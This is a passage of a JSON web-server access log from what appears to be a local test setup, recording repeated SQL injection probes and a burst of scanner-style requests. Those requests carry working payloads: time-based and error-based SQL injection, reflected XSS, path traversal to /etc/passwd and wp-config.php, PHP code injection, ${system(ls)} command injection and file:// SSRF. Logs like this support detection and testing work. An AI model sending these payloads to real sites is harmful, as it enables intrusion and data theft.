"http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:14:20 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:14:21 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.033","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:14:22 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:14:22 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:14:24 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:14:25 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:14:25 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.034","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:14:26 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:14:26 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.031","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:21:00 +0000","request_body":"passwd=admin","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:21:00 +0000","request_body":"passwd=admin","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:21:01 +0000","request_body":"passwd=admin","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.031","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:21:03 +0000","request_body":"passwd=admin","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.020","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:21:04 +0000","request_body":"passwd=admin","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:21:04 +0000","request_body":"passwd=admin","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.020","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:21:22 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.022","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:21:22 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:21:23 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:21:24 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.048","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:21:27 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:21:27 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:24:19 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.033","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:24:19 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.023","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:24:20 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:24:20 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.020","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:24:20 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.020","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:27:38 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.030","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:27:39 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:30:54 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.030","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:30:55 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:30:55 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:30:56 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:30:56 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.031","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:30:57 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:13:30:57 +0000","request_body":"-","remote_addr":"192.168.128.1","http_host":"127.0.0.1","request":"GET /index.php?id=1 and 1=1 -- HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.043","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"{'jql':'project in projectsLeadByUser(\x22297MFiQ2DqqRZg0lEsJi0Bpk1iD\x22)'}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/issueNav/1/issueTable HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/lists.asmx?WSDL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"{\x22metadata\x22:{\x22order_id\x22:\x221 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)\x22},\x22status\x22:2}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inormalydonotexist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sfwd-lms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpunit.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /keycloak.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /asd/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/iwp-client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/bgservlets/test.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx?pid=Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm935/index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/services HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jejob&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"fldr=&url=file:///etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /filemanager/upload.php 